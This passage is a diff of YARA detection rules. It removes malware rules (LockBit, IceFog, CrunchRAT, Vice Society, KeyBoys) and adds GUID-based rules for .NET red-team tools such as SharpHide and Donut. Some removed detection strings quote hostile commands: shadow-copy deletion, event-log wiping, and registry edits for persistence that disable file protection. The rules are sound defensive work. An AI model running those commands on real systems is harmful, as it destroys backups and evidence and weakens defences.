+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_MAL_RANSOM_Lockbit_Apr23_1
+rule SIGNATURE_BASE_HKTL_NET_GUID_Easynet : FILE
 {
 	meta:
-		description = "Detects indicators found in LockBit ransomware"
-		author = "Florian Roth"
-		id = "75dc8b95-16f0-5170-a7d6-fc10bb778348"
-		date = "2023-04-17"
-		modified = "2023-12-05"
-		reference = "https://objective-see.org/blog/blog_0x75.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_lockbit_lnx_macos_apr23.yar#L43-L67"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8408a057-4910-5d7b-80bc-78df17c95bf7"
+		date = "2021-01-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/TheWover/EasyNet"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4741-L4759"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cd5bffa5571abfd1446b065d26c8c23f00fe1376d505af539c6f37356014a86f"
+		logic_hash = "e8502f3d178897f17cdaab0608b5605aeb9161c42779a9d9c1477a5663dd24a1"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xe1 = "-i '/path/to/crypt'" xor
-		$xe2 = "http://lockbit" xor
-		$s1 = "idelayinmin" ascii
-		$s2 = "bVMDKmode" ascii
-		$s3 = "bSelfRemove" ascii
-		$s4 = "iSpotMaximum" ascii
-		$fp1 = "<html"
+		$typelibguid0lo = "3097d856-25c2-42c9-8d59-2cdad8e8ea12" ascii wide
+		$typelibguid0up = "3097D856-25C2-42C9-8D59-2CDAD8E8EA12" ascii wide
+		$typelibguid1lo = "ba33f716-91e0-4cf7-b9bd-b4d558f9a173" ascii wide
+		$typelibguid1up = "BA33F716-91E0-4CF7-B9BD-B4D558F9A173" ascii wide
+		$typelibguid2lo = "37d6dd3f-5457-4d8b-a2e1-c7b156b176e5" ascii wide
+		$typelibguid2up = "37D6DD3F-5457-4D8B-A2E1-C7B156B176E5" ascii wide
 
 	condition:
-		(1 of ( $x* ) or 4 of them ) and not 1 of ( $fp* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_MAL_RANSOM_Lockbit_Locker_LOG_Apr23_1
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpbyebear : FILE
 {
 	meta:
-		description = "Detects indicators found in LockBit ransomware log files"
-		author = "Florian Roth"
-		id = "aa0a2393-e5a2-5151-8afb-91a9bb922179"
-		date = "2023-04-17"
-		modified = "2023-12-05"
-		reference = "https://objective-see.org/blog/blog_0x75.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_lockbit_lnx_macos_apr23.yar#L69-L84"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "4a7f2514-2519-5fd5-9d17-110a67f829e7"
+		date = "2021-01-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/S3cur3Th1sSh1t/SharpByeBear"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4761-L4777"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d5f96e601150209382d3f6458863bc79768beb99b587aa8d9ba37cb2c11ef634"
+		logic_hash = "c6d9fd33dd8d7bddd9e80e3c0106f0cab13f0952bb8269a10df147c06a5bd7ba"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = " is encrypted. Checksum after encryption "
-		$s2 = "~~~~~Hardware~~~~"
-		$s3 = "[+] Add directory to encrypt:"
-		$s4 = "][+] Launch parameters: "
+		$typelibguid0lo = "a6b84e35-2112-4df2-a31b-50fde4458c5e" ascii wide
+		$typelibguid0up = "A6B84E35-2112-4DF2-A31B-50FDE4458C5E" ascii wide
+		$typelibguid1lo = "3e82f538-6336-4fff-aeec-e774676205da" ascii wide
+		$typelibguid1up = "3E82F538-6336-4FFF-AEEC-E774676205DA" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_MAL_RANSOM_Lockbit_Forensicartifacts_Apr23_1
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharphide : FILE
 {
 	meta:
-		description = "Detects forensic artifacts found in LockBit intrusions"
-		author = "Florian Roth"
-		id = "e716030c-ee78-51dc-919c-cf59e93da976"
-		date = "2023-04-17"
-		modified = "2023-12-05"
-		reference = "https://objective-see.org/blog/blog_0x75.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_lockbit_lnx_macos_apr23.yar#L86-L101"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "928e00c1-549a-58f5-9e7e-982a4319691a"
+		date = "2021-01-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/outflanknl/SharpHide"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4779-L4793"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "81021f8c9aed17c007d7329a598c644a706fa9750818c8974984eefcba8d06c2"
+		logic_hash = "3efa5458dcdf447184b91f8fa075c46c82aea25d619c43eabccce4d85ff15f38"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "/tmp/locker.log" ascii fullword
-		$x2 = "Executable=LockBit/locker_" ascii
-		$xc1 = { 54 6F 72 20 42 72 6F 77 73 65 72 20 4C 69 6E 6B 73 3A 0D 0A 68 74 74 70 3A 2F 2F 6C 6F 63 6B 62 69 74 }
+		$typelibguid0lo = "443d8cbf-899c-4c22-b4f6-b7ac202d4e37" ascii wide
+		$typelibguid0up = "443D8CBF-899C-4C22-B4F6-B7AC202D4E37" ascii wide
 
 	condition:
-		1 of ( $x* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Icefog_Malware_Feb18_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsvc : FILE
 {
 	meta:
-		description = "Detects IceFog malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ce8e3a9b-9f4b-534c-983d-bb5490da5768"
-		date = "2018-02-26"
-		modified = "2023-01-06"
-		reference = "https://twitter.com/ClearskySec/status/968104465818669057"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_icefog.yar#L11-L32"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "cbc1d7d4-f3b4-5d02-84ae-621398cb7b51"
+		date = "2021-01-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/jnqpblc/SharpSvc"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4795-L4809"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8bba0f7f6f6aad6586c2c5ed29f30514d2f88703134f331724cc2ff86ccffe87"
+		logic_hash = "61a4269200c699c5d00bde40e11cfec92da5cf7c7aeaffaedf60e70bcb31ccdf"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "480373cffc4e60aa5be2954a156e37d689b92e6e33969958230f2ce59d30b9ec"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "cmd /c %c%s%c" fullword ascii
-		$s2 = "temp.bat" fullword ascii
-		$s3 = "c:\\windows\\debug\\wia\\help" fullword wide
-		$s4 = "/getorder.aspx?hostname=" fullword wide
-		$s5 = "\\filecfg_temp.dat" wide
-		$s6 = "Unknown operating system " fullword wide
-		$s7 = "kastygost.compress.to" fullword wide
-		$s8 = "/downloads/" wide
-		$s9 = "\\key.dat" wide
+		$typelibguid0lo = "52856b03-5acd-45e0-828e-13ccb16942d1" ascii wide
+		$typelibguid0up = "52856B03-5ACD-45E0-828E-13CCB16942D1" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 4 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Crunchrat : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcrasheventlog : FILE
 {
 	meta:
-		description = "Detects CrunchRAT - file CrunchRAT.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "da7d9b5c-6ccc-5960-9daa-4df612545751"
-		date = "2017-11-03"
-		modified = "2023-12-05"
-		reference = "https://github.com/t3ntman/CrunchRAT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_crunchrat.yar#L2-L23"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "85d31989-ad96-5005-a747-8a19a67fdd80"
+		date = "2021-01-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/slyd0g/SharpCrashEventLog"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4811-L4825"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e29cfe6dd2ca69b1a8cd0cb36f7513dd9befd392906225196991dc62fcc80870"
+		logic_hash = "5f286244243024d23a6a27e5713a7ecedef9028b317d5827f35254a35e6c5473"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "58a07e96497745b6fd5075d569f17b0254c3e50b0234744e0487f7c5dddf7161"
 
 	strings:
-		$x1 = "----CrunchRAT" fullword wide
-		$x2 = "\\Debug\\CrunchRAT" ascii
-		$x3 = "\\Release\\CrunchRAT" ascii
-		$s1 = "runCommand" fullword ascii
-		$s2 = "<action>download<action>" fullword wide
-		$s3 = "Content-Disposition: form-data; name=action" fullword wide
-		$s4 = "<action>upload<action>" fullword wide
-		$s5 = "/update.php" fullword wide
+		$typelibguid0lo = "98cb495f-4d47-4722-b08f-cefab2282b18" ascii wide
+		$typelibguid0up = "98CB495F-4D47-4722-B08F-CEFAB2282B18" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 40KB and ( 1 of ( $x* ) and 3 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_MAL_RANSOM_Vicesociety_Polyvice_Jan23_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Dotnettojscript_Languagemodebreakout : FILE
 {
 	meta:
-		description = "Detects NTRU-ChaChaPoly (PolyVice) malware used by Vice Society"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e450407c-6c21-56bf-aedf-8e7f3890abe2"
-		date = "2023-01-12"
-		modified = "2023-01-13"
-		reference = "https://www.sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group-and-the-threat-of-outsourced-development/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ransom_vicesociety_dec22.yar#L2-L31"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8c8cf79f-8e69-5293-b27a-1f8593061627"
+		date = "2021-01-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/FuzzySecurity/DotNetToJScript-LanguageModeBreakout"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4827-L4841"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3c7b76a693e5666515afee5c819b21e119ce5f1b0be675252673e6a24251ce8d"
+		logic_hash = "1f1651b896e62ee669e233403a9fb435adfb4f8965b6432452a1bb72b69bfe2c"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
-		hash1 = "326a159fc2e7f29ca1a4c9a64d45b76a4a072bc39ba864c49d804229c5f6d796"
-		hash2 = "8c8cb887b081e0d92856fb68a7df0dabf0b26ed8f0a6c8ed22d785e596ce87f4"
-		hash3 = "9d9e949ecd72d7a7c4ae9deae4c035dcae826260ff3b6e8a156240e28d7dbfef"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "C:\\Users\\root\\Desktop\\niX\\CB\\libntru\\" ascii
-		$s1 = "C:\\Users\\root" ascii fullword
-		$s2 = "#DBG: target = %s" ascii fullword
-		$s3 = "# ./%s [-p <path>]/[-f <file> ] [-e <enc.extension>] [-m <requirements file name>]" ascii fullword
-		$s4 = "### ################# ###" ascii fullword
-		$op1 = { 89 ca 41 01 fa 89 ef 8b 6c 24 24 44 89 c9 09 d1 44 31 e6 89 c8 }
-		$op2 = { bd 02 00 00 00 29 cd 48 0f bf d1 8b 44 46 02 01 44 53 02 8d 54 0d 00 83 c1 02 48 0f bf c2 }
-		$op3 = { 48 29 c4 4c 8d 74 24 30 4c 89 f1 e8 46 3c 00 00 84 c0 41 89 c4 0f 85 2b 02 00 00 0f b7 45 f2 }
+		$typelibguid0lo = "deadb33f-fa94-41b5-813d-e72d8677a0cf" ascii wide
+		$typelibguid0up = "DEADB33F-FA94-41B5-813D-E72D8677A0CF" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or 2 of them ) or 4 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_MAL_RANSOM_Vicesociety_Chily_Jan23_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpermission : FILE
 {
 	meta:
-		description = "Detects Chily or SunnyDay malware used by Vice Society"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1be4adb9-e60c-5023-9230-07f5fd16daaa"
-		date = "2023-01-12"
-		modified = "2023-12-05"
-		reference = "https://www.sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group-and-the-threat-of-outsourced-development/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ransom_vicesociety_dec22.yar#L33-L63"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d5027f51-f3ca-53cd-96d7-c355b5c2e6fa"
+		date = "2021-01-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/mitchmoser/SharPermission"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4843-L4857"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fc2967d86bf73033e68b8b9409a197ae8f7fcdf06e1e2a17e3d277d243caa541"
-		score = 80
-		quality = 83
+		logic_hash = "c22923057099a6a796cab36838728c0ae51a1c2a6f06c4a0c07415baadac6978"
+		score = 75
+		quality = 85
 		tags = "FILE"
-		hash1 = "4dabb914b8a29506e1eced1d0467c34107767f10fdefa08c40112b2e6fc32e41"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = ".[Chily@Dr.Com]" ascii fullword
-		$s1 = "localbitcoins.com/buy_bitcoins'>https://localbitcoins.com/buy_bitcoins</a>" ascii fullword
-		$s2 = "C:\\Users\\root\\Desktop" ascii fullword
-		$s3 = "for /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\"" wide fullword
-		$s4 = "cd %userprofile%\\documents\\" wide
-		$s5 = "noise.bmp" wide fullword
-		$s6 = " Execution time: %fms (1sec=1000ms)" ascii fullword
-		$s7 = "/c vssadmin.exe Delete Shadows /All /Quiet" wide fullword
-		$op1 = { 4c 89 c5 89 ce 89 0d f5 41 02 00 4c 89 cf 44 8d 04 49 0f af f2 89 15 e9 41 02 00 44 89 c0 }
-		$op2 = { 48 8b 03 48 89 d9 ff 50 10 84 c0 0f 94 c0 01 c0 48 83 c4 20 5b }
-		$op3 = { 31 c0 47 8d 2c 00 45 85 f6 4d 63 ed 0f 8e ec 00 00 00 0f 1f 80 00 00 00 00 0f b7 94 44 40 0c 00 00 83 c1 01 }
+		$typelibguid0lo = "84d2b661-3267-49c8-9f51-8f72f21aea47" ascii wide
+		$typelibguid0up = "84D2B661-3267-49C8-9F51-8F72F21AEA47" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $x* ) or 3 of them ) or 4 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_SUSP_RAR_Single_Doc_File : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Registrystrikesback : FILE
 {
 	meta:
-		description = "Detects suspicious RAR files that contain nothing but a single .doc file"
-		author = "Florian Roth (Nextron Systems)"
-		id = "92dc3a5d-d12c-56d3-8531-25b3da1e1595"
-		date = "2020-07-11"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_hunting_susp_rar.yar#L3-L29"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "1577ed24-0e17-54f9-bc29-bb209acf9645"
+		date = "2021-01-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/mdsecactivebreach/RegistryStrikesBack"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4859-L4873"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bfc8c60c86e65e041976dac9d15c486ad99da930849bd697c869eec0a2626c38"
-		score = 40
+		logic_hash = "fa228e65f6bada1811c83528af8119b5336ebbc2381d5edef35c749ddff02487"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = ".doc"
+		$typelibguid0lo = "90ebd469-d780-4431-9bd8-014b00057665" ascii wide
+		$typelibguid0up = "90EBD469-D780-4431-9BD8-014B00057665" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x6152 and filesize < 4000KB and $s1 at ( uint16( 5 ) + uint16( uint16( 5 ) + 5 ) + uint16( uint16( 5 ) + uint16( uint16( 5 ) + 5 ) + 5 ) - 9 ) and ( uint16( 5 ) + uint16( uint16( 5 ) + 5 ) + uint16( uint16( 5 ) + uint16( uint16( 5 ) + 5 ) + 5 ) + uint32( uint16( 5 ) + uint16( uint16( 5 ) + 5 ) + 7 ) > filesize -8 )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_SUSP_Maldoc_Excelmacro : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Clonevault : FILE
 {
 	meta:
-		description = "Detects malicious Excel macro Artifacts"
-		author = "James Quinn"
-		id = "76806717-a9a8-520e-b6b6-7718eb088de5"
-		date = "2020-11-03"
-		modified = "2023-12-05"
-		reference = "YARA Exchange - Undisclosed Macro Builder"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_macro_builders.yar#L2-L19"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3340a095-d926-5c85-b7ed-03151712538d"
+		date = "2021-01-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/mdsecactivebreach/CloneVault"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4875-L4889"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c5d0655eaf2ca36c828675f9673a1d4284ef8719fd9ec1d354ee3284d1fb0a0c"
-		score = 65
+		logic_hash = "b8a2be082e2444ac9bfa9dd820e08de147c8dbfc0573e7126bde39f18b917bfd"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$artifact1 = {5c 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 2e 00 ?? 00 ?? 00}
-		$url1 = "http://" wide
-		$url2 = "https://" wide
-		$import1 = "URLDownloadToFileA" wide ascii
-		$macro = "xl/macrosheets/"
+		$typelibguid0lo = "0a344f52-6780-4d10-9a4a-cb9439f9d3de" ascii wide
+		$typelibguid0up = "0A344F52-6780-4D10-9A4A-CB9439F9D3DE" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x4b50 and filesize < 2000KB and $artifact1 and $macro and $import1 and 1 of ( $url* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-
-rule SIGNATURE_BASE_Keyboys_Malware_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Donut : FILE
 {
 	meta:
-		description = "Detects Keyboys malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4e334f62-6ffc-55c3-bcbe-ff4a80fb007d"
-		date = "2017-11-02"
-		modified = "2023-12-05"
-		reference = "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_keyboys.yar#L13-L48"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "564dfd0a-af9b-505f-a6f0-de2a5c5c63f3"
+		date = "2021-01-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/TheWover/donut"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4891-L4911"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "78fb48c4b3e09f0d55ca6049601ea62dd526167481725b48de6624bb27fb943b"
+		logic_hash = "cae0d358cda5330f69162aa3116d544f9ba16d37dcbcbf33f9938360b861b89a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1d716cee0f318ee14d7c3b946a4626a1afe6bb47f69668065e00e099be362e22"
-		hash2 = "a6e9951583073ab2598680b17b8b99bab280d6dca86906243bafaf3febdf1565"
-		hash3 = "34f740e5d845710ede1d942560f503e117600bcc7c5c17e03c09bfc66556196c"
-		hash4 = "750f4a9ae44438bf053ffb344b959000ea624d1964306e4b3806250f4de94bc8"
-		hash5 = "fc84856814307a475300d2a44e8d15635dedd02dc09a088a47d1db03bc309925"
-		hash6 = "0f9a7efcd3a2b1441834dae7b43cd8d48b4fc1daeb2c081f908ac5a1369de753"
 
 	strings:
-		$x1 = "reg add HKLM\\%s\\Parameters /v ServiceDll /t REG_EXPAND_SZ /d \"%s\" /f" fullword ascii
-		$x3 = "Internet using \\svchost.exe -k  -n 3" fullword ascii
-		$x4 = "reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v SFCDisable /t REG_DWORD /d 4 /f" fullword ascii
-		$s1 = "sc create %s binpath= \"%s\" Type= share Start= auto DisplayName= \"%s\"" fullword ascii
-		$s2 = "ExecCmd:%s" fullword ascii
-		$s3 = "szCommand : %s" fullword ascii
-		$s4 = "Current user is a member of the %s\\%s group" fullword ascii
-		$s5 = "icacls %s /grant administrators:F" fullword ascii
-		$s6 = "Ping 127.0.0.1 goto Repeat" fullword ascii
-		$s7 = "Start MoveFile %s -> %s" fullword ascii
-		$s8 = "move %s\\dllcache%s %s\\dllcache\\%s" fullword ascii
-		$s9 = "%s\\cmd.exe /c \"%s\"" fullword ascii
+		$typelibguid0lo = "98ca74c7-a074-434d-9772-75896e73ceaa" ascii wide
+		$typelibguid0up = "98CA74C7-A074-434D-9772-75896E73CEAA" ascii wide
+		$typelibguid1lo = "3c9a6b88-bed2-4ba8-964c-77ec29bf1846" ascii wide
+		$typelibguid1up = "3C9A6B88-BED2-4BA8-964C-77EC29BF1846" ascii wide
+		$typelibguid2lo = "4fcdf3a3-aeef-43ea-9297-0d3bde3bdad2" ascii wide
+		$typelibguid2up = "4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2" ascii wide
+		$typelibguid3lo = "361c69f5-7885-4931-949a-b91eeab170e3" ascii wide
+		$typelibguid3up = "361C69F5-7885-4931-949A-B91EEAB170E3" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( pe.imphash ( ) == "68f7eced34c46808756db4b0c45fb589" or ( pe.exports ( "Insys" ) and pe.exports ( "Inuser" ) and pe.exports ( "SSSS" ) ) or 1 of ( $x* ) or 4 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Keyboy_Installclient : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharphandler : FILE
 {
 	meta:
-		description = "Detects KeyBoy InstallClient"
-		author = "Markus Neis, Florian Roth"
-		id = "d1359f35-d6cd-502b-8cf7-6215bf5e62ba"
-		date = "2018-03-26"
-		modified = "2023-12-05"
-		reference = "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_keyboys.yar#L52-L73"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b71198a9-4d00-5d75-bc36-7c40655c84a3"
+		date = "2021-01-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/jfmaes/SharpHandler"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4913-L4929"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "701b87785562dc391191b1e59573c6027b27c4fffe1c9155a82114521c85bc59"
+		logic_hash = "70e8c495c8a340e0afaa38faf0eb96101854a4dc51c29c571d9b74751aec91fd"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "85d32cb3ae046a38254b953a00b37bb87047ec435edb0ce359a867447ee30f8b"
-		hash2 = "b0f120b11f727f197353bc2c98d606ed08a06f14a1c012d3db6fe0a812df528a"
-		hash1 = "d65f809f7684b28a6fa2d9397582f350318027999be3acf1241ff44d4df36a3a"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "egsvr32.exe \"/u bitsadmin /canceft\\windows\\currebitsadmin" ascii
-		$x2 = "/addfibitsadmin /Resumbitsadmin /SetNosoftware\\microsotifyCmdLine " ascii
-		$x3 = "D:\\Work\\Project\\VS\\house\\Apple\\" ascii
-		$x4 = "Bj+I11T6z9HFMG5Z5FMT/u62z9zw8FyWV0xrcK7HcYXkiqnAy5tc/iJuKtwM8CT3sFNuQu8xDZQGSR6D8/Bc/Dpuz8gMJFz+IrYqNAzwuPIitg==" fullword ascii
-		$x5 = "szCmd1:%s" fullword ascii
-		$s1 = "cmd.exe /c \"%s\"" fullword ascii
-		$s4 = "rundll32.exe %s Main" fullword ascii
+		$typelibguid0lo = "46e39aed-0cff-47c6-8a63-6826f147d7bd" ascii wide
+		$typelibguid0up = "46E39AED-0CFF-47C6-8A63-6826F147D7BD" ascii wide
+		$typelibguid1lo = "11dc83c6-8186-4887-b228-9dc4fd281a23" ascii wide
